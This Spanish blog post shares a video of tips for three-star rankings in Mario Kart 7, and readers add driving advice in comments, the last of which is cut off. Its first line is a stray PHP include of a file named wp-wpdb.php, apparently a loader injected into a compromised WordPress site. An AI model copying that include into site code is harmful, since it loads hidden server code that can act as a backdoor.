if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Mario Kart 7, como conseguir 3 estrellas – La Fortaleza de LeChuck

Mario Kart 7, como conseguir 3 estrellas

Mario Kart 7 salió a la venta el pasado 2 de Diciembre y seguro que muchos de vosotros estáis exprimiéndolo al máximo desbloqueando todos los modos y personajes.

¿Cuántos de vosotros queréis conseguir el ranking de 3 estrellas en todas las copas? todos, seguro, que os conozco. Pues aquí os dejo un vídeo en el que podéis encontrar una serie de consejos y estrategias para lograrlo.

No olvideis que podéis jugar con todos los piratas de Mêlée Island, únete a la comunidad LFDL de Mario Kart 7.
Publicada el
Categorizado como Curiosidades

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

10 comentarios

  1. Ojalá fuera tan sencillo. A parte de tener que quedar siempre primero, también se han de conseguir 10 monedas por carrera, no cometer demasiados fallos(caídas, quedarse atascado al chocarse contra una pared…) y evitar, dentro de lo posible, ser golpeado con demasiados objetos.

  2. Las estrellas representan tu técnica de conducción, cuanto mejor lo hagas durante la carrera más estrellas te darán (hasta 3). Para mejorar tu técnica debes dominar los derrapes, no salirte de la carretera, ni tampoco chocarte o caer al vacío. Realmente no influye que llegues primero o no a la meta, ni el número de monedas que cojas.

  3. Por fin, despues de muchos intentos he conseguido todas las estrellas en todas las copas, incluyendo los modos 150cc y espejo.
    No se cual es la fórmula exacta para conseguirlo, pero puedo indicar los consejos que a mi me dieron buenos resultados.
    Para empezar seleccionaba a toad, con el coche nube y ruedas champiñón. Es la combinación mas optima que conseguí. Si disponeis del

Dejar un comentario